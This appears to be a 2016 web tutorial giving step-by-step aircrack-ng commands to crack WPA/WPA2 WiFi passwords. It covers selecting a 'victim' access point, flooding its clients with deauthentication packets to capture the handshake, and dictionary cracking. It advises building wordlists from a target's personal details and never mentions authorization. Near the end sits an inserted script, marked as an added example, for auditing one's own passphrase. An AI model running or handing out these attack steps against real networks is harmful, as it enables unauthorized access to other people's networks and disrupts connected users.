
How to Hack WiFi: Cracking WPA2 WPA WiFi Password [aircrack-ng] – Step by Step Guide


ethicalhackx.com/hack-wifi-cracking-wpa2-wpa-wifi-password

October 6, 2016

How to Hack WiFi: Cracking WPA2 WPA WiFi Password (100%) – Step by Step Guide

Requirements
1- Kali Linux or Backtrack
2- Compatible wireless network adapter that is supported in Kali Linux or Backtrack.
3- A good Wordlist

Step By Step How to Crack WPA2 WPA WiFi (I am using Kali Linux here)

1- Boot into Kali Linux. Open Terminal.

2- Start

airmon-ng

to check the available devices we can use now.

This will show the devices. We have to use airmon-ng to put one of these devices into monitor mode, probably wlan or wlan0 or wlan1.

3- Enable monitor mode on wireless device


In the terminal type

airmon-ng start wlan0

This will create a new monitor mode interface, which will be wlan0mon or mon or wlan1mon. You should remember this name or you will have to check again from step 2.
If you face an error, just issue the following command to correct it automatically and run the above command again

airmon-ng check kill

4- Select the target WiFi router or access point.

We need to fix a target WiFi access point (router) we want to crack. To focus our attack we need the access point's (router's) BSSID and channel. Type the following command.

airodump-ng wlan0mon

We get a complete list of all reachable access points with their BSSID, channel, signal strength and type of encryption. We are interested only in the BSSID and channel, because the rest we are going to crack. In the command above, wlan0mon is the monitor mode interface we created in step 3. Choose your victim based on signal strength, which is in the PWR column. When you have your victim access point (router) you can stop this process with Ctrl+C.

5- Now we start packet capturing from the victim with the following command

airodump-ng --bssid (AP BSSID address) -c (channel no) -w (file name you want to save with) (monitor interface)

Check the last line in the picture above to see the command.

So here I type

airodump-ng --bssid F4:F2:6D:4E:3D:8E -c 3 -w WPAcrack wlan0mon

Packet capturing has started.

6- To capture a 4-way handshake we need clients connected to the access point to reauthenticate with the access point. The already connected devices are listed in the Station column in step 5. So we can issue a command to send deauthentication signals to the access point so that they try to reauthenticate and we capture the handshake.

aireplay-ng --deauth (number of deauthentication packets to send, e.g. 100) -a (BSSID of the network) -c (MAC address of the client) (monitor interface)

aireplay-ng --deauth 1000 -a F4:F2:6D:4E:3D:8E wlan0mon

This will send the deauth signal to the victim access point to disconnect all clients possible.

aireplay-ng --deauth 1000 -a F4:F2:6D:4E:3D:8E -c 9C:99:A0:F2:05:19 wlan0mon

This will disconnect a particular client on the access point (router) to get the handshake quickly.

7- After a few successful handshake captures we are ready to crack the password and get it in plain text.

Here we can see, highlighted, that a handshake from a particular client has been captured. We can also check our present working directory for the captured handshake file.

8- Let's crack this using a brute-force attack with aircrack-ng

The default syntax for aircrack-ng is

aircrack-ng -w (location of the password list) (cap file *.cap)

So here we start the brute force on the captured 4-way handshake file with

aircrack-ng -w 'wordlist.txt' WPAcrack-01.cap

The password, when cracked, will be on your screen in plaintext anytime soon.

DONE. The password here is 01202323680, highlighted in the picture.

Depending on the CPU and other hardware specifications of your system, this process will take some time, as it may have to go through testing millions of passwords. So make a good but short wordlist to cut short the number of attempts and the time taken. On

We need a dictionary or wordlist file to take sample passwords from.


How to create a good wordlist with crunch – How To Make Good Wordlist using Crunch
The default wordlist in Backtrack is at /pentest/passwords/wordlists/darkc0de.lst

The default wordlist in Kali can be located and copied to the current working directory with the command below
cp /usr/share/wordlists/rockyou.txt.gz .
Unzip / extract the wordlist file from the compressed file with this command
gunzip rockyou.txt.gz

Get the number of passwords in this wordlist file rock


wc -l rockyou.txt
14344392 passwords in this.

NOTE: A good wordlist should be short in case you know the person very well and can guess the password, so a wordlist can be generated consisting of his house number, name, love affairs, mobile number, date of birth and similar info. The password may also be very random; in that case you need a much bigger wordlist to try your patience. It may take even 10 hours in that case. You may also download wordlists available on the net or try the dictionary for whole words.
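The wordlist attack in step 8 only succeeds when the passphrase is in the list or is trivially enumerable, like the 11-digit number recovered above. The script below is an added example, not part of the original guide, that checks your own access point's passphrase for those two weaknesses; the function names, the finding labels and the sample wordlist are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original guide): audit your own WPA/WPA2
# passphrase for the weaknesses a wordlist attack on a captured handshake uses.
# Exit status: 0 = no finding, 1 = weak, 2 = not a valid passphrase.
audit_psk() {
    psk=$1 wordlist=$2 findings=""
    len=${#psk}

    # WPA/WPA2-Personal passphrases are 8 to 63 characters long.
    if [ "$len" -lt 8 ] || [ "$len" -gt 63 ]; then
        echo "INVALID: length $len is outside 8-63"
        return 2
    fi

    # -F fixed string, -x whole line: the passphrase is literally in the list.
    if grep -Fxq -e "$psk" "$wordlist"; then
        findings="$findings in-wordlist"
    elif grep -Fxiq -e "$psk" "$wordlist"; then
        findings="$findings in-wordlist-ignoring-case"
    fi

    # Digits only (mobile number, date of birth): at most 10^len candidates.
    case $psk in
        *[!0-9]*) ;;
        *) findings="$findings digits-only" ;;
    esac

    if [ -n "$findings" ]; then
        echo "WEAK:$findings"
        return 1
    fi
    echo "OK"
}

# Constructed sample wordlist; in practice use the extracted rockyou.txt.
make_sample_wordlist() {
    f=$(mktemp) || return 1
    printf '%s\n' password iloveyou 01202323680 sunshine1 > "$f"
    echo "$f"
}

wl=$(make_sample_wordlist)
for p in 01202323680 ILOVEYOU 5550100123 'correct horse battery staple' short; do
    printf '%-30s ' "$p"
    audit_psk "$p" "$wl" || true
done
rm -f "$wl"
```

A passphrase that reports OK here is only absent from this particular list; a long, random passphrase remains the actual defence.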

How To Disable monitor mode wlan0mon

airmon-ng stop wlan0mon

Don’t forget to restart the network manager. It is usually done with the following command:

service network-manager start
